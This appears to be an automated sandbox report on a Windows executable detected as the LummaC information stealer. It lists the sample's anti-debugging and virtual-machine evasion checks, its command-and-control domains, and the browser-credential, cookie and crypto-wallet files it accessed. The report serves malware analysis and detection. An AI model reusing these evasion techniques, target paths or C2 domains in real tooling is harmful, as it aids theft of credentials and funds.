Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D879E second address: 66D8801 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22CC1B8ACh 0x00000008 jp 00007FC22CC1B8A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 mov dword ptr [ebp+122D3BB6h], ebx 0x00000017 call 00007FC22CC1B8A9h 0x0000001c pushad 0x0000001d jmp 00007FC22CC1B8B2h 0x00000022 ja 00007FC22CC1B8A8h 0x00000028 popad 0x00000029 push eax 0x0000002a push ecx 0x0000002b je 00007FC22CC1B8A8h 0x00000031 pushad 0x00000032 popad 0x00000033 pop ecx 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 jmp 00007FC22CC1B8ACh 0x0000003d mov eax, dword ptr [eax] 0x0000003f jnp 00007FC22CC1B8B4h 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 9A8E92 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: B60C8E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: BE87B2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 66C8E1D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 651B152 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 651DF42 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 66D5BAC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 6765397 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 652297C instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality to detect virtual machines (SLDT)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Code function: 0_3_014F1775 sldt word ptr [eax+0000007Ah]

0_3_014F1775

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 2352	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 2052	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 2828	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 3700	Thread sleep time: -38019s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000002.1876753898.00000000063DC000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1877430428.00000000066AA000.00000040.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B85000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001447000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWZ
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 0zBsv1tnt4.exe, 00000000.00000002.1876753898.00000000063DC000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1877430428.00000000066AA000.00000040.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: NTICE
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: SICE
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Code function: 0_2_0098E110 LdrInitializeThunk,

0_2_0098E110

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: 0zBsv1tnt4.exe	String found in binary or memory: hummskitnj.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: appliacnesot.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: cashfuzysao.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: inherineau.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: screwamusresz.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: rebuildeso.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: scentniej.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: mindhandru.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: prisonyfork.buzz

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior

Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OProgram Manager
Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000002.1877430428.00000000066AA000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: {Program Manager

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: 0zBsv1tnt4.exe, 00000000.00000003.1626030544.000000000150B000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001462000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 0zBsv1tnt4.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 0zBsv1tnt4.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"
Source: 0zBsv1tnt4.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0T
Source: 0zBsv1tnt4.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 0zBsv1tnt4.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keysto
Source: 0zBsv1tnt4.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 0zBsv1tnt4.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
